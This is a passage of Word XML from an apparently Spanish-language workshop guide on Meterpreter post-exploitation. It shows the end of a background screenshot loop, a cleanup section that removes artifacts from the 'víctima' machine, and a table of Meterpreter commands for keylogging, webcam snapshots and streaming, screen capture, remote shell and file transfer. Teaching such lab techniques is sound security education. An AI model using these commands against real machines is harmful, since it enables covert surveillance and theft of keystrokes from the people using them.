        <w:t xml:space="preserve">done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x /tmp/loop_screenshot.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/loop_screenshot.sh &amp;</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F59E0B" w:sz="4"/>
              <w:left w:val="single" w:color="F59E0B" w:sz="16"/>
              <w:bottom w:val="single" w:color="F59E0B" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBCC" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="92400E"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Nota: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92400E"/>
              </w:rPr>
              <w:t xml:space="preserve">Este método funciona solo si hay una sesión activa de Meterpreter. Es menos eficiente que el script en la víctima.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Limpieza (Post-Taller)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al terminar el taller, limpiar los artefactos dejados en la víctima:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; shell</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 Eliminar el script subido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; del C:\Windows\Temp\captura_pantalla.ps1</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 Eliminar las capturas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; rmdir /s /q C:\screenshots</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 Terminar procesos de powershell relacionados (opcional)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; taskkill /f /im powershell.exe</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C:\Windows\system32&gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cerrar la sesión Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. Resumen de Comandos Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="4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72"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="282A36" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F8F8F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Actividad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="282A36" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F8F8F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Comando</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="282A36" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F8F8F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Stream de pantalla</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">screenshare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Abre stream en el browser local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Captura estática</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">screenshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Guarda un jpeg de la pantalla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Iniciar keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">keyscan_start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Comienza a registrar teclas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ver teclas capturadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">keyscan_dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Vuelca el buffer del keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detener keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">keyscan_stop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detiene la captura</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Consola remota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Abre cmd.exe interactivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Listar cámaras</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">webcam_list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Muestra cámaras disponibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Foto de cámara</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">webcam_snap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Captura una imagen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Stream de cámara</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">webcam_stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Stream de video en vivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Subir archivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">upload src dst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sube archivo a la víctima</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bajar archivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">download src dst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="F8F8F8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descarga archivo desde víctima</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Info del sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6272A4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sysinfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3272"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SO, hostname, arquitectura</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
